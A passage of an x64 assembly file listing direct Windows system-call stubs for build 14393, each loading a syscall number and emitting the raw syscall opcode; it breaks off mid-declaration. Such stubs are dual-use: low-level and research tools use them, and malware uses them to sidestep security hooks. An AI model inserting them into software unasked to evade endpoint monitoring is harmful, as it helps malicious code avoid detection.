; ULONG64 __stdcall NtReadRequestData( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 );
_10_0_14393_sp0_windows_10_rs1_1607_NtReadRequestData PROC STDCALL
mov r10 , rcx
mov eax , 84
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtReadRequestData ENDP
; ULONG64 __stdcall NtCreateFile( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 , ULONG64 arg_08 , ULONG64 arg_09 , ULONG64 arg_10 , ULONG64 arg_11 );
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateFile PROC STDCALL
mov r10 , rcx
mov eax , 85
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateFile ENDP
; ULONG64 __stdcall NtQueryEvent( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryEvent PROC STDCALL
mov r10 , rcx
mov eax , 86
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryEvent ENDP
; ULONG64 __stdcall NtWriteRequestData( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 );
_10_0_14393_sp0_windows_10_rs1_1607_NtWriteRequestData PROC STDCALL
mov r10 , rcx
mov eax , 87
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtWriteRequestData ENDP
; ULONG64 __stdcall NtOpenDirectoryObject( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenDirectoryObject PROC STDCALL
mov r10 , rcx
mov eax , 88
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenDirectoryObject ENDP
; ULONG64 __stdcall NtAccessCheckByTypeAndAuditAlarm( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 , ULONG64 arg_08 , ULONG64 arg_09 , ULONG64 arg_10 , ULONG64 arg_11 , ULONG64 arg_12 , ULONG64 arg_13 , ULONG64 arg_14 , ULONG64 arg_15 , ULONG64 arg_16 );
_10_0_14393_sp0_windows_10_rs1_1607_NtAccessCheckByTypeAndAuditAlarm PROC STDCALL
mov r10 , rcx
mov eax , 89
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtAccessCheckByTypeAndAuditAlarm ENDP
; ULONG64 __stdcall NtQuerySystemTime( ULONG64 arg_01 );
_10_0_14393_sp0_windows_10_rs1_1607_NtQuerySystemTime PROC STDCALL
mov r10 , rcx
mov eax , 90
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtQuerySystemTime ENDP
; ULONG64 __stdcall NtWaitForMultipleObjects( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtWaitForMultipleObjects PROC STDCALL
mov r10 , rcx
mov eax , 91
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtWaitForMultipleObjects ENDP
; ULONG64 __stdcall NtSetInformationObject( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSetInformationObject PROC STDCALL
mov r10 , rcx
mov eax , 92
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSetInformationObject ENDP
; ULONG64 __stdcall NtCancelIoFile( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtCancelIoFile PROC STDCALL
mov r10 , rcx
mov eax , 93
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCancelIoFile ENDP
; ULONG64 __stdcall NtTraceEvent( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 );
_10_0_14393_sp0_windows_10_rs1_1607_NtTraceEvent PROC STDCALL
mov r10 , rcx
mov eax , 94
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtTraceEvent ENDP
; ULONG64 __stdcall NtPowerInformation( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtPowerInformation PROC STDCALL
mov r10 , rcx
mov eax , 95
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtPowerInformation ENDP
; ULONG64 __stdcall NtSetValueKey( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSetValueKey PROC STDCALL
mov r10 , rcx
mov eax , 96
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSetValueKey ENDP
; ULONG64 __stdcall NtCancelTimer( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtCancelTimer PROC STDCALL
mov r10 , rcx
mov eax , 97
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCancelTimer ENDP
; ULONG64 __stdcall NtSetTimer( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 );
_10_0_14393_sp0_windows_10_rs1_1607_NtSetTimer PROC STDCALL
mov r10 , rcx
mov eax , 98
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtSetTimer ENDP
; ULONG64 __stdcall NtAccessCheckByType( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 , ULONG64 arg_08 , ULONG64 arg_09 , ULONG64 arg_10 , ULONG64 arg_11 );
_10_0_14393_sp0_windows_10_rs1_1607_NtAccessCheckByType PROC STDCALL
mov r10 , rcx
mov eax , 99
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtAccessCheckByType ENDP
; ULONG64 __stdcall NtAccessCheckByTypeResultList( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 , ULONG64 arg_08 , ULONG64 arg_09 , ULONG64 arg_10 , ULONG64 arg_11 );
_10_0_14393_sp0_windows_10_rs1_1607_NtAccessCheckByTypeResultList PROC STDCALL
mov r10 , rcx
mov eax , 100
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtAccessCheckByTypeResultList ENDP
; ULONG64 __stdcall NtAccessCheckByTypeResultListAndAuditAlarm( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 , ULONG64 arg_08 , ULONG64 arg_09 , ULONG64 arg_10 , ULONG64 arg_11 , ULONG64 arg_12 , ULONG64 arg_13 , ULONG64 arg_14 , ULONG64 arg_15 , ULONG64 arg_16 );
_10_0_14393_sp0_windows_10_rs1_1607_NtAccessCheckByTypeResultListAndAuditAlarm PROC STDCALL
mov r10 , rcx
mov eax , 101
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtAccessCheckByTypeResultListAndAuditAlarm ENDP
; ULONG64 __stdcall NtAccessCheckByTypeResultListAndAuditAlarmByHandle( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 , ULONG64 arg_08 , ULONG64 arg_09 , ULONG64 arg_10 , ULONG64 arg_11 , ULONG64 arg_12 , ULONG64 arg_13 , ULONG64 arg_14 , ULONG64 arg_15 , ULONG64 arg_16 , ULONG64 arg_17 );
_10_0_14393_sp0_windows_10_rs1_1607_NtAccessCheckByTypeResultListAndAuditAlarmByHandle PROC STDCALL
mov r10 , rcx
mov eax , 102
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtAccessCheckByTypeResultListAndAuditAlarmByHandle ENDP
; ULONG64 __stdcall NtAddAtomEx( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 );
_10_0_14393_sp0_windows_10_rs1_1607_NtAddAtomEx PROC STDCALL
mov r10 , rcx
mov eax , 103
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtAddAtomEx ENDP
; ULONG64 __stdcall NtAddBootEntry( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtAddBootEntry PROC STDCALL
mov r10 , rcx
mov eax , 104
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtAddBootEntry ENDP
; ULONG64 __stdcall NtAddDriverEntry( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtAddDriverEntry PROC STDCALL
mov r10 , rcx
mov eax , 105
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtAddDriverEntry ENDP
; ULONG64 __stdcall NtAdjustGroupsToken( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 );
_10_0_14393_sp0_windows_10_rs1_1607_NtAdjustGroupsToken PROC STDCALL
mov r10 , rcx
mov eax , 106
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtAdjustGroupsToken ENDP
; ULONG64 __stdcall NtAdjustTokenClaimsAndDeviceGroups( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 , ULONG64 arg_08 , ULONG64 arg_09 , ULONG64 arg_10 , ULONG64 arg_11 , ULONG64 arg_12 , ULONG64 arg_13 , ULONG64 arg_14 , ULONG64 arg_15 , ULONG64 arg_16 );
_10_0_14393_sp0_windows_10_rs1_1607_NtAdjustTokenClaimsAndDeviceGroups PROC STDCALL
mov r10 , rcx
mov eax , 107
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtAdjustTokenClaimsAndDeviceGroups ENDP
; ULONG64 __stdcall NtAlertResumeThread( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtAlertResumeThread PROC STDCALL
mov r10 , rcx
mov eax , 108
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtAlertResumeThread ENDP
; ULONG64 __stdcall NtAlertThread( ULONG64 arg_01 );
_10_0_14393_sp0_windows_10_rs1_1607_NtAlertThread PROC STDCALL
mov r10 , rcx
mov eax , 109
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtAlertThread ENDP
; ULONG64 __stdcall NtAlertThreadByThreadId( ULONG64 arg_01 );
_10_0_14393_sp0_windows_10_rs1_1607_NtAlertThreadByThreadId PROC STDCALL
mov r10 , rcx
mov eax , 110
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtAlertThreadByThreadId ENDP
; ULONG64 __stdcall NtAllocateLocallyUniqueId( ULONG64 arg_01 );
_10_0_14393_sp0_windows_10_rs1_1607_NtAllocateLocallyUniqueId PROC STDCALL
mov r10 , rcx
mov eax , 111
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtAllocateLocallyUniqueId ENDP
; ULONG64 __stdcall NtAllocateReserveObject( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtAllocateReserveObject PROC STDCALL
mov r10 , rcx
mov eax , 112
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtAllocateReserveObject ENDP
; ULONG64 __stdcall NtAllocateUserPhysicalPages( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtAllocateUserPhysicalPages PROC STDCALL
mov r10 , rcx
mov eax , 113
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtAllocateUserPhysicalPages ENDP
; ULONG64 __stdcall NtAllocateUuids( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 );
_10_0_14393_sp0_windows_10_rs1_1607_NtAllocateUuids PROC STDCALL
mov r10 , rcx
mov eax , 114
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtAllocateUuids ENDP
; ULONG64 __stdcall NtAlpcAcceptConnectPort( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 , ULONG64 arg_08 , ULONG64 arg_09 );
_10_0_14393_sp0_windows_10_rs1_1607_NtAlpcAcceptConnectPort PROC STDCALL
mov r10 , rcx
mov eax , 115
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtAlpcAcceptConnectPort ENDP
; ULONG64 __stdcall NtAlpcCancelMessage( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtAlpcCancelMessage PROC STDCALL
mov r10 , rcx
mov eax , 116
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtAlpcCancelMessage ENDP
; ULONG64 __stdcall NtAlpcConnectPort( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 , ULONG64 arg_08 , ULONG64 arg_09 , ULONG64 arg_10 , ULONG64 arg_11 );
_10_0_14393_sp0_windows_10_rs1_1607_NtAlpcConnectPort PROC STDCALL
mov r10 , rcx
mov eax , 117
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtAlpcConnectPort ENDP
; ULONG64 __stdcall NtAlpcConnectPortEx( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 , ULONG64 arg_08 , ULONG64 arg_09 , ULONG64 arg_10 , ULONG64 arg_11 );
_10_0_14393_sp0_windows_10_rs1_1607_NtAlpcConnectPortEx PROC STDCALL
mov r10 , rcx
mov eax , 118
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtAlpcConnectPortEx ENDP
; ULONG64 __stdcall NtAlpcCreatePort( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtAlpcCreatePort PROC STDCALL
mov r10 , rcx
mov eax , 119
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtAlpcCreatePort ENDP
; ULONG64 __stdcall NtAlpcCreatePortSection( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 );
_10_0_14393_sp0_windows_10_rs1_1607_NtAlpcCreatePortSection PROC STDCALL
mov r10 , rcx
mov eax , 120
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtAlpcCreatePortSection ENDP
; ULONG64 __stdcall NtAlpcCreateResourceReserve( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 );
_10_0_14393_sp0_windows_10_rs1_1607_NtAlpcCreateResourceReserve PROC STDCALL
mov r10 , rcx
mov eax , 121
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtAlpcCreateResourceReserve ENDP
; ULONG64 __stdcall NtAlpcCreateSectionView( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtAlpcCreateSectionView PROC STDCALL
mov r10 , rcx
mov eax , 122
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtAlpcCreateSectionView ENDP
; ULONG64 __stdcall NtAlpcCreateSecurityContext( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtAlpcCreateSecurityContext PROC STDCALL
mov r10 , rcx
mov eax , 123
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtAlpcCreateSecurityContext ENDP
; ULONG64 __stdcall NtAlpcDeletePortSection( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtAlpcDeletePortSection PROC STDCALL
mov r10 , rcx
mov eax , 124
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtAlpcDeletePortSection ENDP
; ULONG64 __stdcall NtAlpcDeleteResourceReserve( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtAlpcDeleteResourceReserve PROC STDCALL
mov r10 , rcx
mov eax , 125
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtAlpcDeleteResourceReserve ENDP
; ULONG64 __stdcall NtAlpcDeleteSectionView( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtAlpcDeleteSectionView PROC STDCALL
mov r10 , rcx
mov eax , 126
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtAlpcDeleteSectionView ENDP
; ULONG64 __stdcall NtAlpcDeleteSecurityContext( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtAlpcDeleteSecurityContext PROC STDCALL
mov r10 , rcx
mov eax , 127
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtAlpcDeleteSecurityContext ENDP
; ULONG64 __stdcall NtAlpcDisconnectPort( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtAlpcDisconnectPort PROC STDCALL
mov r10 , rcx
mov eax , 128
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtAlpcDisconnectPort ENDP
; ULONG64 __stdcall NtAlpcImpersonateClientContainerOfPort( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtAlpcImpersonateClientContainerOfPort PROC STDCALL
mov r10 , rcx
mov eax , 129
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtAlpcImpersonateClientContainerOfPort ENDP
; ULONG64 __stdcall NtAlpcImpersonateClientOfPort( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtAlpcImpersonateClientOfPort PROC STDCALL
mov r10 , rcx
mov eax , 130
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtAlpcImpersonateClientOfPort ENDP
; ULONG64 __stdcall NtAlpcOpenSenderProcess( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 );
_10_0_14393_sp0_windows_10_rs1_1607_NtAlpcOpenSenderProcess PROC STDCALL
mov r10 , rcx
mov eax , 131
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtAlpcOpenSenderProcess ENDP
; ULONG64 __stdcall NtAlpcOpenSenderThread( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 );
_10_0_14393_sp0_windows_10_rs1_1607_NtAlpcOpenSenderThread PROC STDCALL
mov r10 , rcx
mov eax , 132
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtAlpcOpenSenderThread ENDP
; ULONG64 __stdcall NtAlpcQueryInformation( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtAlpcQueryInformation PROC STDCALL
mov r10 , rcx
mov eax , 133
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtAlpcQueryInformation ENDP
; ULONG64 __stdcall NtAlpcQueryInformationMessage( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 );
_10_0_14393_sp0_windows_10_rs1_1607_NtAlpcQueryInformationMessage PROC STDCALL
mov r10 , rcx
mov eax , 134
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtAlpcQueryInformationMessage ENDP
; ULONG64 __stdcall NtAlpcRevokeSecurityContext( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtAlpcRevokeSecurityContext PROC STDCALL
mov r10 , rcx
mov eax , 135
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtAlpcRevokeSecurityContext ENDP
; ULONG64 __stdcall NtAlpcSendWaitReceivePort( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 , ULONG64 arg_08 );
_10_0_14393_sp0_windows_10_rs1_1607_NtAlpcSendWaitReceivePort PROC STDCALL
mov r10 , rcx
mov eax , 136
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtAlpcSendWaitReceivePort ENDP
; ULONG64 __stdcall NtAlpcSetInformation( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 );
_10_0_14393_sp0_windows_10_rs1_1607_NtAlpcSetInformation PROC STDCALL
mov r10 , rcx
mov eax , 137
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtAlpcSetInformation ENDP
; ULONG64 __stdcall NtAreMappedFilesTheSame( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtAreMappedFilesTheSame PROC STDCALL
mov r10 , rcx
mov eax , 138
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtAreMappedFilesTheSame ENDP
; ULONG64 __stdcall NtAssignProcessToJobObject( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtAssignProcessToJobObject PROC STDCALL
mov r10 , rcx
mov eax , 139
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtAssignProcessToJobObject ENDP
; ULONG64 __stdcall NtAssociateWaitCompletionPacket( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 , ULONG64 arg_08 );
_10_0_14393_sp0_windows_10_rs1_1607_NtAssociateWaitCompletionPacket PROC STDCALL
mov r10 , rcx
mov eax , 140
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtAssociateWaitCompletionPacket ENDP
; ULONG64 __stdcall NtCancelIoFileEx( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtCancelIoFileEx PROC STDCALL
mov r10 , rcx
mov eax , 141
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCancelIoFileEx ENDP
; ULONG64 __stdcall NtCancelSynchronousIoFile( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtCancelSynchronousIoFile PROC STDCALL
mov r10 , rcx
mov eax , 142
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCancelSynchronousIoFile ENDP
; ULONG64 __stdcall NtCancelTimer2( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtCancelTimer2 PROC STDCALL
mov r10 , rcx
mov eax , 143
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCancelTimer2 ENDP
; ULONG64 __stdcall NtCancelWaitCompletionPacket( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtCancelWaitCompletionPacket PROC STDCALL
mov r10 , rcx
mov eax , 144
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCancelWaitCompletionPacket ENDP
; ULONG64 __stdcall NtCommitComplete( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtCommitComplete PROC STDCALL
mov r10 , rcx
mov eax , 145
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCommitComplete ENDP
; ULONG64 __stdcall NtCommitEnlistment( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtCommitEnlistment PROC STDCALL
mov r10 , rcx
mov eax , 146
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCommitEnlistment ENDP
; ULONG64 __stdcall NtCommitRegistryTransaction( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtCommitRegistryTransaction PROC STDCALL
mov r10 , rcx
mov eax , 147
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCommitRegistryTransaction ENDP
; ULONG64 __stdcall NtCommitTransaction( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtCommitTransaction PROC STDCALL
mov r10 , rcx
mov eax , 148
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCommitTransaction ENDP
; ULONG64 __stdcall NtCompactKeys( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtCompactKeys PROC STDCALL
mov r10 , rcx
mov eax , 149
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCompactKeys ENDP
; ULONG64 __stdcall NtCompareObjects( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtCompareObjects PROC STDCALL
mov r10 , rcx
mov eax , 150
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCompareObjects ENDP
; ULONG64 __stdcall NtCompareTokens( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtCompareTokens PROC STDCALL
mov r10 , rcx
mov eax , 151
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCompareTokens ENDP
; ULONG64 __stdcall NtCompleteConnectPort( ULONG64 arg_01 );
_10_0_14393_sp0_windows_10_rs1_1607_NtCompleteConnectPort PROC STDCALL
mov r10 , rcx
mov eax , 152
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCompleteConnectPort ENDP
; ULONG64 __stdcall NtCompressKey( ULONG64 arg_01 );
_10_0_14393_sp0_windows_10_rs1_1607_NtCompressKey PROC STDCALL
mov r10 , rcx
mov eax , 153
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCompressKey ENDP
; ULONG64 __stdcall NtConnectPort( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 , ULONG64 arg_08 );
_10_0_14393_sp0_windows_10_rs1_1607_NtConnectPort PROC STDCALL
mov r10 , rcx
mov eax , 154
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtConnectPort ENDP
; ULONG64 __stdcall NtCreateDebugObject( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 );
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateDebugObject PROC STDCALL
mov r10 , rcx
mov eax , 155
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateDebugObject ENDP
; ULONG64 __stdcall NtCreateDirectoryObject( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
